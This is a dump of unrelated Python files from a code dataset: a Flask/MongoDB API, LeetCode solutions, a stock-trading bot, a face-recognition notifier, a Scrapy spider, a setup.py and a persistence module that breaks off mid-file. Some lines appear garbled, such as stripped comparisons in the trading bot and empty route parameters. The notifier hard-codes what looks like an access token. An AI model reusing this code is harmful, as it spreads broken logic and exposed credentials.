file.write(self.textEdit.toHtml())\n\n def openFile(self):\n # Get filename and show only .writer files\n self.filename = QtGui.QFileDialog.getOpenFileName(self, 'Open File',\".\",filter= \"All (*);;txt(*.wrt *.txt)\")\n\n if self.filename:\n with open(self.filename,\"rt\") as file:\n self.textEdit.setText(file.read())\n\n def preview(self):\n\n # Open preview dialog\n preview = QtGui.QPrintPreviewDialog()\n\n # If a print is requested, open print dialog\n preview.paintRequested.connect(lambda p: self.textEdit.print_(p))\n\n preview.exec_()\n\n def printHandler(self):\n\n # Open printing dialog\n dialog = QtGui.QPrintDialog()\n\n if dialog.exec_() == QtGui.QDialog.Accepted:\n self.textEdit.document().print_(dialog.printer())\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n form = Notepad()\n form.show()\n app.exec_()\n\nif __name__ == '__main__':\n main()","sub_path":"unit_05/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"550828668","text":"from flask import Flask, request, jsonify\nfrom pymongo import MongoClient\nimport json\n\nFRUIT_LIST = ['banana', 'apple', 'orange', 'strawberry']\nVEGETABLE_LIST = ['cucumber', 'beetroot', 'carrot', 'celery']\n\napp = Flask(__name__)\napp.config.from_object('config.DevelopmentConfig')\n\ndef get_db():\n client = MongoClient(app.config['DB_HOST'], app.config['DB_PORT'])\n db = client[app.config['DB_NAME']]\n return client, db\n\n@app.before_first_request\ndef init_db():\n client, db = get_db()\n\n resource_path = app.config['RESOURCES_PATH']\n\n companies_collection = db['companies']\n companies = companies_collection.find({})\n if companies.count() == 0:\n with open(f'{resource_path}/companies.json') as f:\n companies_data = json.load(f)\n companies_collection.insert_many(companies_data) \n\n people_collection = db['people']\n if people_collection.count() == 0:\n with 
open(f'{resource_path}/people.json') as f:\n people_data = json.load(f)\n for p in people_data:\n favouriteFood = p['favouriteFood']\n p['favouriteVegetables'] = list(filter(lambda x: x in VEGETABLE_LIST, favouriteFood))\n p['favouriteFruits'] = list(filter(lambda x: x in FRUIT_LIST, favouriteFood))\n del p['favouriteFood']\n people_collection.insert_one(p)\n\n client.close()\n\n\n@app.route('/')\ndef hello():\n return \"Welcome to Paranuara!\"\n\n@app.route('/companies//employees', methods= ['GET'])\ndef get_company_employees(company_id):\n result = []\n\n try:\n client, db = get_db()\n\n companies_collection = db['companies']\n\n company = companies_collection.find_one({'index': company_id})\n if not company:\n return 'Company not found', 404\n\n people_collection = db['people']\n\n employees = people_collection.find({'company_id': company_id})\n \n for e in employees:\n result.append(e)\n\n client.close()\n except Exception as e:\n print('Unexpected error:', str(e))\n return 'Internal Server Error', 500\n\n return jsonify({'employees': result}), 200\n\n\n@app.route('/people/filtered_common_friends', methods= ['GET'])\ndef get_filtered_common_friends():\n try:\n first_id = int(request.args.get('first_id'))\n second_id = int(request.args.get('second_id'))\n except ValueError:\n return 'Invalid person id', 400\n\n result = []\n try:\n client, db = get_db()\n\n people_collection = db['people']\n\n persons = people_collection.find({'$or': [\n {'index': first_id },\n {'index': second_id }\n ]})\n\n if persons.count() < 2:\n return 'Person not found', 404\n\n if persons.count() > 2:\n return 'Corrupted data', 500 \n\n common_friends = set() \n\n first_person = {}\n second_person = {}\n for p in persons:\n if p['index'] == first_id: \n first_person = {\n 'name': p['name'],\n 'age': p['age'],\n 'address': p['address'],\n 'phone': p['phone']\n }\n else:\n second_person = {\n 'name': p['name'],\n 'age': p['age'],\n 'address': p['address'],\n 'phone': p['phone']\n }\n\n friends = p['friends']\n for f in friends:\n common_friends.add(f['index'])\n\n filtered_common_friends = people_collection.find({'$and': [\n {'index': {'$in': list(common_friends)}},\n {'eyeColor': 'brown'},\n {'has_died': False}\n ]}) \n\n for f in filtered_common_friends:\n result.append(f) \n\n client.close()\n except Exception as e:\n print('Unexpected error:', str(e))\n return 'Internal Server Error', 500\n\n return jsonify({'first_person': first_person, 'second_person': second_person,'filtered_common_friends': result})\n\n@app.route('/people//favouriteFood', methods= ['GET'])\ndef get_favourite_food(person_id):\n\n result = {}\n try:\n client, db = get_db()\n\n people_collection = db['people']\n\n person = people_collection.find_one({'index': person_id})\n\n if not person:\n return 'Person not found', 404\n \n client.close()\n except Exception as e:\n print('Unexpected error:', str(e))\n return 'Internal Server Error', 500\n\n return jsonify({\n 'username': person['name'],\n 'age': person['age'],\n 'fruits': person['favouriteFruits'],\n 'vegetables': person['favouriteVegetables']\n })\n\nif __name__ == '__main__':\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"118107177","text":"# Leetcode 86. 
Partition List\n\n\"\"\"\nGiven a linked list and a value x, partition it such that all nodes less than\nx come before nodes greater than or equal to x.\n\nYou should preserve the original relative order of the nodes in each of the\ntwo partitions.\n\nExample:\n\nInput: head = 1->4->3->2->5->2, x = 3\nOutput: 1->2->2->4->3->5\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n small = smallHead = ListNode(0)\n big = bigHead = ListNode(0)\n curr = head\n while curr:\n next = curr.next\n curr.next = None\n if curr.val < x:\n small.next = curr\n small = small.next\n else:\n big.next = curr\n big = big.next\n curr = next\n small.next = bigHead.next\n return smallHead.next\n\n\nclass Solution:\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n dummy = ListNode(0)\n dummy.next = head\n left, prev, curr = dummy, dummy, head\n while curr:\n if left == prev:\n if curr.val < x: left = left.next\n prev, curr = curr, curr.next\n else:\n if curr.val >= x: prev, curr = curr, curr.next\n else:\n prev.next = curr.next\n curr.next = left.next\n left.next = curr\n left = left.next\n curr = prev.next\n return dummy.next\n\n\n \n","sub_path":"Leetcode in Python/Linked List/Leetcode 86. Partition List.py","file_name":"Leetcode 86. Partition List.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"446998698","text":"# -*- coding: cp936 -*-\n\n#1) 准备股票池,去除停牌,去除ST\n#2) 登陆交易妥当,得到总资金\n#3)获得做收价\n#4) 等待时间,9.25开始,调用wsq获取股票池股票价格\n#5) 跌幅大于8%的,计算购买量,计算购买价,统一使用下单函数下单。\n#6)结束\n#7)可以通过tquery查询\n\n\n\n\nfrom WindPy import *\nimport time as st;\nfrom datetime import *;\n\ndef getStocks():\n w.start();\n data=w.wset('SectorConstituent','field=wind_code;sector=全部A股(非ST)')\n \n return (data.ErrorCode,data.Data[0]);\n\ndef logonTo():\n data=w.start(60);\n if(data.ErrorCode!=0):\n return (-1,None);\n data=w.tlogon('0000','0','w081263801','0','SHSZ');\n if(data.ErrorCode!=0):\n return (-2,None);\n return(0,data.Data[0][0]);\n\ndef ifelse(c,v1,v2):\n if(c):\n return (v1);\n else:\n return (v2);\ndef buyOnOpen(codes,amount=10000000,chggate=0.08,addprice=0.01):\n\n (err,logonid)=logonTo()\n if(err):\n print(\"logon error:\",err);\n return(err);\n \n data=w.wsq(codes,'rt_pre_close');\n if(data.ErrorCode!=0):\n return (-1);\n preprice = data.Data[0];\n gateprice = [l*(1-chggate) for l in preprice];\n \n nextquerytime=datetime.now()+timedelta(0,120)\n while(1):\n now = datetime.now();\n endtime = datetime(now.year,now.month,now.day,9,31,00);\n begintime=datetime(now.year,now.month,now.day,9,25,00);\n\n if(now>endtime):\n print(\"now >9:30:00\")\n return (1)\n\n if(now11):\n if(now>nextquerytime):\n data = w.tquery(1);\n if(data.ErrorCode!=0):\n print(\"tquery(1) error!\");\n return(-1);\n nextquerytime=datetime.now()+timedelta(0,120);\n data=w.wsq(codes,'rt_pre_close');\n if(data.ErrorCode!=0):\n return (-1);\n preprice = data.Data[0];\n gateprice = [l*(1-chggate) for l in preprice];\n\n delta=10;\n print(\"wait to open,sleep ten seconds!\");\n st.sleep(delta);\n continue;\n\n data = w.wsq(codes,'rt_last');\n if(data.ErrorCode!=0):\n continue;\n\n index =list();\n for i in range(len(data.Data[0])):\n if( (data.Data[0][i]0.0001)):\n index.append(i);\n if(len(index)<1):\n continue;\n 
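# place the orders: one buy per triggered code, price = last + addprice, with the total amount split evenly across codes\n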
buycodes = [codes[i] for i in index];\n buyprice = [data.Data[0][i]+addprice for i in index];\n everyamount = amount/len(buyprice);\n buyvol = [int(everyamount/v/100)*100 for v in buyprice]\n buyvol = [v>500000 for v in buyvol]\n logonids = [logonid for v in range(len(buycodes))];\n data=w.torder(buycodes,'buy',buyprice,buyvol,logonid=logonids);\n print(data)\n return (0)\n \n\n(err,codes)=getStocks();\nif(err==0):\n buyOnOpen(codes);\nelse:\n print(\"getStocks error:\",err);\n","sub_path":"Python/buyOnOpen.py","file_name":"buyOnOpen.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"255172859","text":"from __future__ import print_function\nimport os.path as path\nimport sys\nimport numpy as np\nfrom scipy.io.netcdf import netcdf_file as nopen\n\n\n__version__ = '0.3'\n\n\n_base_dir = path.join(path.dirname(__file__), 'data')\nhas_const = path.exists(path.join(_base_dir, 't_constituents_const.nc'))\nhas_sat = path.exists(path.join(_base_dir, 't_constituents_sat.nc'))\nhas_shallow = path.exists(path.join(_base_dir, 't_constituents_shallow.nc'))\n\nif (has_const and has_sat and has_shallow):\n _const = {}\n _sat = {}\n _shallow = {}\n\n ncid = nopen(path.join(_base_dir,\n 't_constituents_const.nc'), 'r', mmap=False)\n for key in ncid.variables.keys():\n _const[key] = ncid.variables[key].data\n ncid.close()\n\n ncid = nopen(path.join(_base_dir,\n 't_constituents_sat.nc'), 'r', mmap=False)\n for key in ncid.variables.keys():\n _sat[key] = ncid.variables[key].data\n ncid.close()\n\n ncid = nopen(path.join(_base_dir,\n 't_constituents_shallow.nc'), 'r', mmap=False)\n for key in ncid.variables.keys():\n _shallow[key] = ncid.variables[key].data\n ncid.close()\n\n # Correct issues with name strings\n _const['name'] = np.array([b''.join([s for s in arr])\n for arr in _const['name']])\n\n _const['kmpr'] = np.array([b''.join([s for s in arr])\n for arr in _const['kmpr']])\n\nelse:\n print('You do not have t_constituents_*.npy ' +\n 'check that package installation is correct.')\n _const = {}\n _sat = {}\n _shallow = {}\n","sub_path":"ttide/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417964433","text":"import time\r\nimport cv2 as cv\r\nimport smtplib as sm\r\nimport os\r\nfrom practicum import find_mcu_boards, McuBoard, PeriBoard\r\nfrom requests import get, post\r\nfrom line_notify import LineNotify\r\n\r\n\r\ndef notifymessage(message):\r\n payload = {\"message\": message}\r\n sendnotify(payload)\r\n\r\ndef notifypic(message, url):\r\n payload = {\"message\": message,\r\n \"imageFile\": open(url,'rb')}\r\n sendnotify(payload)\r\n\r\ndef sendnotify(payload, file = None):\r\n url = 'https://notify-api.line.me/api/notify'\r\n token = '2dlsMzR3c0HjNMYtZVKyt1Wou1dX02RLzs6sJRyW6iD'\r\n headers = {\"content-type\": \"application/x-www-form-urlencoded\",\r\n \"Authorization\": f\"Bearer {token}\"}\r\n #payload = {\"message\": message}\r\n r = post(url, headers=headers, data=payload, files=file)\r\n print(r.text)\r\n\r\ndef sendpic(txt, path, token):\r\n notify = LineNotify(token)\r\n notify.send(txt + ' checked in', path) # send picture\r\n\r\n#notifymessage(\"bung\")\r\n\r\nhaar_cascade = cv.CascadeClassifier('haarcascade_frontalface_default.xml')\r\npeople = ['You_know_who', 'Taro', 'prayuth', 'M']\r\n#features = np.load('features.npy', allow_pickle=True)\r\n#labels = 
np.load('labels.npy')\r\nimg = 0\r\npath = '/home/pi/practicum/project/usb-example/python/pic/'\r\nface_recognizer = cv.face.LBPHFaceRecognizer_create()\r\nface_recognizer.read('face_trained.yml')\r\ncapture = cv.VideoCapture(0)\r\nswitch = 0\r\nlst = [0] * len(people)\r\nunknown = 0\r\nfinish = 0\r\nnump = 1\r\ntoken = '2dlsMzR3c0HjNMYtZVKyt1Wou1dX02RLzs6sJRyW6iD'\r\n\r\ndevices = find_mcu_boards()\r\nmcu = McuBoard(devices[0])\r\nperi = PeriBoard(mcu)\r\nperi.get_switch()\r\nperi.set_led(0,0)\r\nperi.set_led(1,0)\r\nperi.set_led(2,0)\r\n\r\nwhile True:\r\n #capture = cv.VideoCapture(\"192.168.2.46:8080\")\r\n blank, img = capture.read()\r\n img+=1\r\n img = cv.resize(img, (300,200))\r\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n #cv.imshow('Person', gray)\r\n\r\n # Detect the face in the image\r\n faces_rect = haar_cascade.detectMultiScale(gray, 1.1, 4)\r\n \r\n for (x,y,w,h) in faces_rect:\r\n faces_roi = gray[y:y+h,x:x+h]\r\n label, confidence = face_recognizer.predict(faces_roi)\r\n print(f'label = {people[label]} with a confidence of {confidence} lst[label]={lst[label]}')\r\n print(f'unknown={unknown}')\r\n\r\n if (unknown >=50):\r\n #red\r\n if(finish == 0):\r\n peri.set_led(0,1)\r\n peri.set_led(1,0)\r\n peri.set_led(2,0)\r\n cv.imwrite(os.path.join(path,'photo' + str(nump) + '.jpeg'),img)\r\n #notifymessage(\"Unknown\")\r\n #notifypic(\"Unknown\",path+'photo' + str(nump) + '.jpeg')\r\n sendpic(\"Unknown\", path+\"photo1.jpeg\", token) \r\n nump += 1\r\n lst = [0] * len(people)\r\n unknown = 0\r\n finish = 1\r\n if(lst[label]>=50):\r\n if(finish == 0): \r\n peri.set_led(0,0)\r\n peri.set_led(1,0)\r\n peri.set_led(2,1)\r\n cv.imwrite(os.path.join(path,'photo' + str(nump) + '.jpeg'),img)\r\n #notifymessage(people[label]+' checked in')\r\n #notifypic(people[label] + ' checked in', path+'photo' + str(nump) + '.jpeg')\r\n sendpic(people[label], path+\"photo1.jpeg\", token)\r\n nump += 1\r\n #f=open(\"int.txt\",\"w\")\r\n #integer=1\r\n #f.write(str(integer))\r\n #f.truncate()\r\n unknown = 0\r\n lst = [0] * len(people)\r\n finish = 1\r\n if(lst[label]>=0 or unknown >= 0):\r\n #yellow\r\n if(finish == 0):\r\n peri.set_led(0,0)\r\n peri.set_led(1,1)\r\n peri.set_led(2,0)\r\n if (confidence >= 60 and confidence <= 100):\r\n lst[label] += 1\r\n cv.putText(img, str(people[label]), (x, y - 4), cv.FONT_HERSHEY_COMPLEX, 0.8, (0, 255, 0), thickness=2)\r\n cv.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), thickness=2)\r\n cv.imshow('Detected Face', img)\r\n elif(confidence < 60 or confidence > 100):\r\n unknown+=1\r\n cv.putText(img, \"Unknown\", (x,y-4), cv.FONT_HERSHEY_COMPLEX, 0.8, (0,0,255), thickness=2)\r\n cv.rectangle(img, (x,y), (x+w,y+h), (000,0,255), thickness=2)\r\n cv.imshow('Detected Face', img)\r\n \r\n if(cv.waitKey(1) & 0xFF == ord('d')):\r\n peri.set_led(0,0)\r\n peri.set_led(1,0)\r\n peri.set_led(2,0)\r\n break\r\n","sub_path":"sourcecode/usb-example/python/face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"81261763","text":"import pygame\n\n# Setup\npygame.init()\n\n# Set the width and height of the screen [width,height]\ndisplayinfo = pygame.display.Info()\nheight = displayinfo.current_h - 200\nhh = height/2\nscreen = pygame.display.set_mode([height, height])\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 
0)","sub_path":"the_new_rpg/src/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"120091647","text":"\n#DOES NOT WORK\n#Attempts to fill out form and parse, results\n\n\n\n\nimport scrapy\n\n\nclass ContractFormSpider(scrapy.Spider):\n name = \"contract_form\"\n\n def start_requests(self):\n url = 'https://www.fbo.gov/index?s=opportunity&tab=search&mode=list'\n\n\n\n yield scrapy.Request(url=url, callback=self.parse)\n\n\n def parse(self, response):\n\n # store html of URL in html file to be analyzed\n # filename = 'fbo-form.html'\n # with open(filename, 'wb') as f:\n # f.write(response.body)\n # self.log('Saved file %s' % filename)\n yield scrapy.FormRequest.from_response(\n response,\n formdata={'dnf_class_values[procurement_notice][naics_code][]' : '0001',\n 'dnf_class_values[procurement_notice][searchtype]' : 'active',\n 'dnf_class_values[procurement_notice][all_agencies]' : 'all',\n 'dnf_class_values[procurement_notice][recovery_act]' : '0'},\n formname='vendor_procurement_notice_search',\n callback=self.after_form,\n method=\"POST\",\n )\n\n def after_form(self, response):\n url = 'https://www.fbo.gov/?s=opportunity&mode=list&tab=searchresults'\n\n\n yield scrapy.Request(url=url, callback=self.after_form_parse)\n\n\n # filename = 'response.html'\n # with open(filename, 'wb') as f:\n # f.write(response.headers)\n # self.log('Saved file %s' % filename)\n # return response\n\n def after_form_parse(self, response):\n\n filename = 'response.html'\n with open(filename, 'wb') as f:\n f.write(response.body)\n self.log('Saved file %s' % filename)\n","sub_path":"examples/contract_form_spider.py","file_name":"contract_form_spider.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"137248531","text":"#!/usr/bin/env Python\n# -*- coding: utf-8 -*-\n\nimport datetime\n\n# d1 = datetime.date(input('Please input the Startdate\"as: 2017,8,10\" :'))\n# d2 = datetime.date(input('Please input the Enddate\"as: 2017,8,10\" :'))\n#\n# # d3 = datetime.date(d1)\n# # d4 = datetime.date(d2)\n#\n# print(d1.days)\n# print(d2.days)\n#\n# print((d2-d1).days)\n#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# import datetime\n# i = datetime.datetime.now()\n# print(\"当前的日期和时间是 %s\" % i)\n# print(\"ISO格式的日期和时间是 %s\" % i.isoformat())\n# print(\"当前的年份是 %s\" % i.year)\n# print(\"当前的月份是 %s\" % i.month)\n# print(\"当前的日期是 %s\" % i.day)\n# print(\"dd/mm/yyyy 格式是 %s/%s/%s\" % (i.day, i.month, i.year))\n# print(\"当前小时是 %s\" % i.hour)\n# print(\"当前分钟是 %s\" % i.minute)\n# print(\"当前秒是 %s\" % i.second)\n\n\n\n#import time\n\n# t = time.time()\n# print(t)\n#\n# # import time\n#\n# localtime = time.localtime(time.time())\n# print(\"本地时间为 :\", localtime)\n# print(\"本地时间为 :\", localtime.tm_year)\n\n# dt = \"2016-05-05 20:28:54\"\n\n\n\n\n# 输入两个时间,输出相隔多少天\nimport time\n#输入\ndt_s = input('输入开始时间,\"e:20170703\": ')\ndt_e = input('输入结束时间,\"e:20170703\": ')\n#转换成时间数组\ntimeArray_s = time.strptime(dt_s, \"%Y%m%d\")\ntimeArray_e = time.strptime(dt_e, \"%Y%m%d\")\n# print(timeArray_e,timeArray_s)\n#转换成时间戳\ntimestamp_s = time.mktime(timeArray_s)\ntimestamp_e = time.mktime(timeArray_e)\n# print(timestamp_e)\n# print(timestamp_s)\n#转换成天数\nsjc = (timestamp_e - timestamp_s)\ndt = (timestamp_e - timestamp_s)/(60 * 60 * 24)\nnj = (5*dt)/365\nprint(\"两个日期之间有 %d 天.\" % dt)\nprint(\"年假有 %.2f 天.\" % 
nj)\n#print(sjc)","sub_path":"py_coding/3.0+/Date/date_to_date.py","file_name":"date_to_date.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"177331422","text":"import csv\nimport multiprocessing as mp\nimport os\n\nfrom common import timeit, load_configurations, create_demand_matrix_for_configuration\nfrom network import OriginalDanNetwork, EgoBalanceDanNetwork, BfsDanNetwork, HuffmanDanNetwork, RandomDanNetwork\n\nFIG_NUM = 0\n\n\n@timeit\ndef main(show=False):\n configurations = load_configurations(\"../config.json\")\n active_config = configurations[1]\n\n res = []\n\n vertex_nums = [25, 50, 75, 100, 125, 150, 175, 200]\n delta_nums = [10, 16, 24, 48]# , \"1d\", \"2d\", \"4d\", \"6d\", \"8d\", \"10d\", \"12d\"]\n constants = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n if not os.path.exists(\"unified_res\"):\n os.mkdir(\"unified_res\")\n res_file_original = os.path.join('unified_res', 'e_barabasi_unified_1.csv')\n\n # if not os.path.exists(\"egobalance_res\"):\n # os.mkdir(\"egobalance_res\")\n # res_file_egobalance = os.path.join('egobalance_res', 'results_s_egobalance.csv')\n #\n # if not os.path.exists(\"huffman_res\"):\n # os.mkdir(\"huffman_res\")\n # res_file_huffman = os.path.join('huffman_res', 'results_s_huffman.csv')\n #\n # if not os.path.exists(\"bfs_res\"):\n # os.mkdir(\"bfs_res\")\n # res_file_bfs = os.path.join('bfs_res', 'results_s_bfs.csv')\n #\n # if not os.path.exists(\"random_res\"):\n # os.mkdir(\"random_res\")\n # res_file_random = os.path.join('random_res', 'results_s_random.csv')\n\n fields = ['graph', 'vertex_num', 'constant', 'congestion', 'real_congestion', 'avg_route_len', 'delta',\n 'max_delta', 'dan', 'most_congested_route', 'max_route_len', 'avg_tree_weight', 'most_tree_ratio',\n 'tree_count', 'type', 'start_entropy']\n\n with open(res_file_original, 'w') as csvFile:\n writer = csv.DictWriter(csvFile, fieldnames=fields)\n writer.writeheader()\n csvFile.close()\n\n # with open(res_file_huffman, 'w') as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writeheader()\n # csvFile.close()\n #\n # with open(res_file_bfs, 'w') as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writeheader()\n # csvFile.close()\n #\n # with open(res_file_egobalance, 'w') as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writeheader()\n # csvFile.close()\n #\n # with open(res_file_random, 'w') as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writeheader()\n # csvFile.close()\n\n for vertex_num in vertex_nums:\n for delta_num in delta_nums:\n configs = []\n for constant in constants:\n for i in range(20):\n active_cfg = active_config.copy()\n active_cfg['vertex_num'] = vertex_num\n active_cfg['constant'] = constant\n active_cfg['dan'] = delta_num\n configs.append(active_cfg)\n\n with mp.Pool() as p:\n res1 = p.map(run_dan_original, configs)\n res2 = p.map(run_dan_egobalance, configs)\n res3 = p.map(run_dan_huffman, configs)\n res4 = p.map(run_dan_bfs, configs)\n res5 = p.map(run_dan_random, configs)\n\n\n with open(res_file_original, \"a+\") as csvFile:\n writer = csv.DictWriter(csvFile, fieldnames=fields)\n writer.writerows(res1)\n writer.writerows(res2)\n writer.writerows(res3)\n writer.writerows(res4)\n writer.writerows(res5)\n csvFile.close()\n\n # with open(res_file_egobalance, \"a+\") as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # 
writer.writerows(res2)\n # csvFile.close()\n #\n # with open(res_file_huffman, \"a+\") as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writerows(res3)\n # csvFile.close()\n #\n # with open(res_file_bfs, \"a+\") as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writerows(res4)\n # csvFile.close()\n #\n # with open(res_file_random, \"a+\") as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writerows(res5)\n # csvFile.close()\n\n # if show:\n # render_everyting(network)\n # plt.show()\n\n\ndef run_dan_original(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = OriginalDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"original\"}\n\n\ndef run_dan_egobalance(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = EgoBalanceDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"egobalance\"}\n\n\ndef run_dan_bfs(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = BfsDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"bfs\"}\n\n\ndef run_dan_huffman(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = HuffmanDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"huffman\"}\n\n\ndef run_dan_random(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = RandomDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"random\"}\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/barabasi_benchmark/benchmark-all-dan.py","file_name":"benchmark-all-dan.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"351826947","text":"import sys\nimport os\n\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))\nfrom commonfunc import get_timestamp_by_time\nimport constvars\n\ndef makeexpecteddata(hour=-1):\n\n with open(os.path.abspath(os.path.dirname(__file__)) + '/../testdata/FileOnDemandCleaned.txt', 'r') as resultfile:\n orglines = resultfile.readlines()\n\n time_format = constvars.recorddate + '000001'\n timestamp = long(get_timestamp_by_time(time_format)[:-3])\n\n with open(os.path.abspath(os.path.dirname(__file__)) + \"/../inputdata/%s.txt\"%__name__.split('.')[-1],\"w\") as expectedfile:\n resultlist = {}\n for line in orglines:\n _,peerid,timesp,_,_,_,_,_,type = line.split(',')\n type=type.replace('\\n','')\n for i in range(24):\n if (timestamp + 3600*(i+1)) > long(timesp[:-3]) >= (timestamp + 3600*i):\n if i not in resultlist:\n resultlist[i]={}\n if peerid not in resultlist[i]:\n resultlist[i][peerid] = 1\n else:\n resultlist[i][peerid] = resultlist[i][peerid] + 1\n break\n\n for hour, 
values in resultlist.items():\n for peeid, count in values.items():\n expectedfile.write('%s,%s,%d\\n' % (peeid,hour,count))\n\n return os.path.abspath(os.path.dirname(__file__)) + \"/../inputdata/%s.txt\"%__name__.split('.')[-1]\n\n\n","sub_path":"lib/platform/dataprocess/logicmodule/PeerHourPlayCount.py","file_name":"PeerHourPlayCount.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269965100","text":"from setuptools import setup, find_packages\nimport os\nimport os.path as op\nimport uuid\n\nver_file = os.path.join('popylar', 'version.py')\nwith open(ver_file) as f:\n exec(f.read())\n\npopylar_path = op.join(op.expanduser('~'), '.popylar')\nuid = uuid.uuid1()\n\nfhandle = open(popylar_path, 'a')\nfhandle.write(uid.hex)\nfhandle.close()\n\nPACKAGES = find_packages()\n\nopts = dict(name=NAME,\n maintainer=MAINTAINER,\n maintainer_email=MAINTAINER_EMAIL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n url=URL,\n download_url=DOWNLOAD_URL,\n license=LICENSE,\n classifiers=CLASSIFIERS,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n platforms=PLATFORMS,\n version=VERSION,\n requires=REQUIRES)\n\n\nif __name__ == '__main__':\n setup(**opts)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30791674","text":"##############################################################################\n#\n# Copyright (c) 2011 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Mongo Persistent Data Manager\"\"\"\nfrom __future__ import absolute_import\nimport UserDict\nimport persistent\nimport pymongo\nimport pymongo.dbref\nimport transaction\nimport zope.interface\n\nfrom mongopersist import interfaces, serialize\n\ndef create_conflict_error(obj, new_doc):\n return interfaces.ConflictError(\n None, obj,\n (new_doc.get('_py_serial', 0), serialize.u64(obj._p_serial)))\n\ndef processSpec(collection, spec):\n try:\n adapter = interfaces.IMongoSpecProcessor(None)\n except TypeError:\n # by default nothing is registered, handle that case\n return spec\n\n return adapter.process(collection, spec)\n\nclass Root(UserDict.DictMixin):\n\n database='mongopersist'\n collection = 'persistence_root'\n\n def __init__(self, jar, database=None, collection=None):\n self._jar = jar\n if database is not None:\n self.database = database\n if collection is not None:\n self.collection = collection\n db = self._jar._conn[self.database]\n self._collection_inst = db[self.collection]\n\n def __getitem__(self, key):\n doc = self._collection_inst.find_one(\n processSpec(self._collection_inst, {'name': key}))\n if doc is None:\n raise KeyError(key)\n return self._jar.load(doc['ref'])\n\n def __setitem__(self, key, value):\n dbref = 